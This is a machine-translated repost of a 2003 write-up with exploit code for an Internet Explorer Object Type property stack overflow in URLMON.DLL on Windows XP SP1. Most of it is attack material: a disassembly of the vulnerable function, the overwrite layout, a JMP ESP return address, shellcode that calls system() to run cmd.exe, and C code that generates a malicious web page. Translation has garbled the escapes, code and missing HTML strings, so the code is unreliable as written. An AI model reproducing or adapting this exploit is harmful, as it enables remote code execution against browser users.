2. Tech
  3. [Practical] Internet Explorer Object Type Property Overflow

[Practical] Internet Explorer Object Type Property Overflow

xiaoxiao2021-03-06  23

Research experience in Internet Explorer Object Type Property overflow

Creation time: 2003-06-08

Article attribute: original

Article submission:

Nanika (minjack.tw_at_yahoo.com.tw)

Research experience in Internet Explorer Object Type Property overflow

Nanika@seed.net.tw or minjack.tw@yahoo.com.tw

Test System WindowsXP_SP1 Traditional Chinese Professional Edition

Iexplorer 6.00.2800.1106 (xpsp1.020828-1920)

URLMON.DLL 6.00.2800.1170

MSVCRT.DLL 7.0.2600.1106 (XPSP1.020828-1920)

SHLWAPI.DLL 6.00.2800.1106 (xpsp1.020828-1920)

I provide some technical details I have studied, give you a reference, let everyone discuss research, write more common ways

Simple Exploit:

Constructing the following data stored into web files

CCCC

Use IE to open the constructed web page

Club RET 444444444 can change the program process

It looks like a traditional stack overflow

But there is a little similar FSO

[64 * /] [AAAA] [DDDD] [Arbitrary Address (EDI)]

AAAA is EBP value

DDDD is EIP value

But the subsequent data is not an ESP value.

EDI value

A piece of data carefully constructed Object Type

You can write this paragraph

Arbitrary address

However, [any address] cannot be 00, if there is a 00, a bit of data is taken into any address, so that the value of any address is, there is a certain range, and cannot be controlled freely.

And there is also a difficult [any address] of the positioning aspects.

This means RET uses JMP ESP

If the reference

Eeye Digital Security's statement uses JMP EDX or Call Edx

There are some problems in Shellcode to the program in positioning.

Re-analyze detailed

Buffer overflow key functions

Urlmon.dll

.Text: 1A441CF6 SUB_1A441CF6 Proc Near; Code Xref: .text: 1A42590EP

.TEXT: 1A441CF6

.TEXT: 1A441CF6 var_104 = byte PTR-104H

.TEXT: 1A441CF6 arg_0 = DWORD PTR 8

.TEXT: 1A441CF6 ARG_4 = DWORD PTR 0CH

.TEXT: 1A441CF6 arg_8 = DWORD PTR 10H

.TEXT: 1A441CF6

.TEXT: 1A441CF6 PUSH EBP

.TEXT: 1A441CF7 MOV EBP, ESP

.TEXT: 1A441CF9 SUB ESP, 104H

.Text: 1A441CFF MOV ECX, [EBP ARG_8]

.Text: 1A441D02 Push ESI

.Text: 1A441D03 MOV ESI, ECX

.TEXT: 1A441D05 MOV CL, [ECX]

.TEXT: 1A441D07 TEST CL, CL

.Text: 1A441D09 Lea Eax, [EBP VAR_104]

.TEXT: 1A441D0F MOV [EBP VAR_104], CL

.TEXT: 1A441D15 JZ Short Loc_1a441d35

.TEXT: 1A441D17

.Text: 1A441D17 Loc_1a441d17:; code xref: SUB_1A441CF6 3DJ

.TEXT: 1A441D17 CMP CL, 2FH.TEXT: 1A441D1A JNZ Short Loc_1a441d2b

.Text: 1A441D1C MOV BYTE PTR [EAX], 5FH; Put / (2F) Expanded _2F_

.TEXT: 1A441D1F Inc EAX

.Text: 1A441D20 MOV BYTE PTR [EAX], 32H

.Text: 1A441D23 Inc EAX

.Text: 1A441D24 MOV BYTE PTR [EAX], 46H

.TEXT: 1A441D27 Inc EAX

.Text: 1A441D28 MOV BYTE PTR [EAX], 5FH

.TEXT: 1A441D2B

.Text: 1A441D2B Loc_1a441d2b:; Code Xref: SUB_1A441CF6 24J

.TEXT: 1A441D2B INC ESI

.Text: 1A441D2C MOV CL, [ESI]

.TEXT: 1A441D2E Inc EAX

.Text: 1A441D2F TEST CL, CL

.TEXT: 1A441D31 MOV [EAX], Cl; Copy String Generate Buffer Slips

.TEXT: 1A441D33 JNZ Short Loc_1a441d17

.TEXT: 1A441D35

.TEXT: 1A441D35 LOC_1A441D35:; Code XREF: SUB_1A441CF6 1FJ

.Text: 1A441D35 Lea Eax, [EBP VAR_104]

.Text: 1A441D3B Push EAX

.Text: 1A441D3C MOV EAX, [EBP ARG_4]

.TEXT: 1A441D3F PUSH OFFSET DWORD_1A441D5C

.Text: 1A441D44 DEC EAX

.Text: 1A441D45 Push EAX

.TEXT: 1A441D46 PUSH [EBP ARG_0]

.Text: 1A441D49 Call DS: Wnsprintfa; because of the reason here, the subsequent overwriting is not an ESP value. If you want to bypass this area, you must fill in a free 00 and writable location.

.TEXT: 1A441D4F Add ESP, 10h

.Text: 1A441D52 XOR EAX, EAX

.Text: 1A441D54 POP ESI

.Text: 1A441D55 Leave

.TEXT: 1A441D56 RETN 0CH; Return to DDDD

.TEXT: 1A441D56 SUB_1A441CF6 ENDP

If you want to use this vulnerability using JMP ESP, you can build such a string, you can

"/ x8b / xc4" // MOV EAX, ESP

"/ x50" // push eax

"/ xb8 / x44 / x80 / ​​xbf / x77" // MOV EAX, SYSTEM_FUN_ADDR

"/ XFF / XD0" // Call EAX

"/ x41 / x41" // incap = NOP

"/ xb8 / xfd / x98 / xe5 / x77" // MOV EAX, EXIXITPROCESS_FUN_ADDR

"/ XFF / XD0" // Call EAX

"/ x41 / x41"; // incc ECX = NOP

Unsigned char eipaddr [5] =

"/ XCC / X59 / XFB / X77"; // JMP ESP NTDLL.DLL AddR 77fb59cc Pass WideChar

Unsigned char PAD [5] =

"/ x30 / x80 / ​​x10 / x01";

UNSIGNED CHAR BUF [65] = ""

INT j = 0;

INT i = 0;

void main ()

{

UNSIGNED CHAR TEMP;

Unsigned char change;

CHAR path [256];

File * bof;

Struct stat st;

printf ( "/ n / tBuffer overflow in Internet Explorer Object Type Property Overflow / n / tBig5 Unicode Exploit by Nanika / n / ttest WindowsXP_SP1 Big5 ver / n / tEmail: minjack.tw@yahoo.com.tw or Nanika@seed.net .tw / n ");

STRCPY (path, "// Explorer_exp_nanika");

Mkdir (PATH);

SetFileAttributes (Path, File_Attribute_readonly);

STRCAT (path, "// exploit_ie_overflow.htm");

IF (Stat (PATH, & ST) == 0)

{REMOVE (PATH); EXIT (1);} // Just Execute this Program TWICE TO Remote this file: P

BOF = fopen (PATH, "W");

FPUTS ("

{

BUF [i ] = 0x2f;

}

BUF [SIZEOF (BUF) -1] = 0;

FPRINTF (Bof, "% s", buf); // buff

FPUTS ("AAAA", BOF); // PAD

FPUTS ("AAAA", BOF); // EBP

FPRINTF (BOF, "% s", Eipaddr); // Ret -> JMP ESP [NTDLL]

FPRINTF (Bof, "% s", pad); // EDI

FPUTS ("Aaaaaaaaa", BOF); // Pad

FPRINTF (Bof, "% s", shellcode; // shellcode

FPUTS ("/"> CCCC ", BOF);

Fclose (BOF);

Printf ("/ NEXPLOIT FILE:% s created./nif success en exploit_ie_overflow.htm exec cmd.exe / NTRY EXE AGAIN WILL KILL EXPLOIT FILE / N", PATH)

}

In addition to the above two methods, it is also possible to use Call DS: WNSPrintfa, because here can be written to any address, but must be accurately positioned, and need to be compliant Character Encoding

Next, other vulnerabilities utilization methods may require a master's research.

I hope that you will see this article has a little harvest.

Thank you for empty reading thanks.

转载请注明原文地址:https://www.9cbs.com/read-40959.html

9cbs

New Post(0)
CopyRight © 2020 All Rights Reserved
Processed: 0.058, SQL: 9